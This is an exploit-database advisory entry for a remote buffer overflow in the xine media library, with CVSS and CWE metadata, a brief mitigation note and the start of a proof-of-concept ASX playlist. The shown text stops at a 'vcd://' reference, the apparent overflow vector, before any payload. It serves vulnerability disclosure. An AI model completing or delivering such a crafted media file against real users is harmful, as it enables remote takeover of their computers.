xine media library remote buffer overflow vulnerability

vendor:

xine media library

by:

c0ntex

7.5

CVSS

HIGH

Remote Buffer Overflow

119

CWE

Product Name: xine media library

Affected Version From: rc-5

Affected Version To: 0.99.2

Patch Exists: NO

Related CWE:

CPE: a:xine:xine-lib

Metasploit:

Other Scripts:

Platforms Tested:

2004

xine media library remote buffer overflow vulnerability

The xine media library is affected by a remote buffer overflow vulnerability, which allows a remote attacker to gain unauthorized access to a vulnerable computer. The vulnerability exists in xine-lib rc-5 and prior versions, as well as xine versions 0.99.2 and prior.

Mitigation:

Update to a patched version of xine-lib or xine that addresses the buffer overflow vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10890/info

It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer.

xine-lib rc-5 and prior versions are reportedly affected by this issue. xine versions 0.99.2 and prior are also vulnerable.

<asx version = "3.0">
<title>Open Security Media Archive</title>
<author>Brought to you by c0ntex[at]open-security.org</author>
<abstract>
SongList:
Track 1 - Open Security Rock(s) -> SOAD - Chop Suey
Track 2 - Open Security Rock(s) -> Media Mayhem Militia
</abstract>
<entry>
<title>System Of A Down - Chop Suey</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?2004</copyright>
<Ref href = "http://sunscreen/SOAD-ChopSuey.mp3"/>
</entry>
<entry>
<title>All your media are belong to us!</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?2004</copyright>
<Ref href = "vcd://